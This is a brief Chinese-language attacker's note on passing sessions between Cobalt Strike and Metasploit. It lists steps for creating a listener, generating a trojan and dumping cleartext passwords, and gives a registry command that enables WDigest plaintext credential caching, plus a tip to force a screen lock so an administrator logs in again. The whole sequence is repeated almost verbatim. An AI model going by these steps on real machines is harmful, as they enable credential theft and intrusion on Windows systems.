cs与msf权限传递
启动cs
创建监听
生成木马
抓取明文密码
默认的缓存表中是不存在明文密码,需要通过修改注册表来让Wdigest Auth保存明文口令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f 1 /f
强制锁屏可以通过脚本来实现,管理员重新登录后再抓取明文密码
抓取成功
启动cs
创建监听
生成木马
默认的缓存表中是不存在明文密码,需要通过修改注册表来让Wdigest Auth保存明文口令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f 1 /f
强制锁屏可以通过脚本来实现,管理员重新登录后再抓取明文密码
抓取成功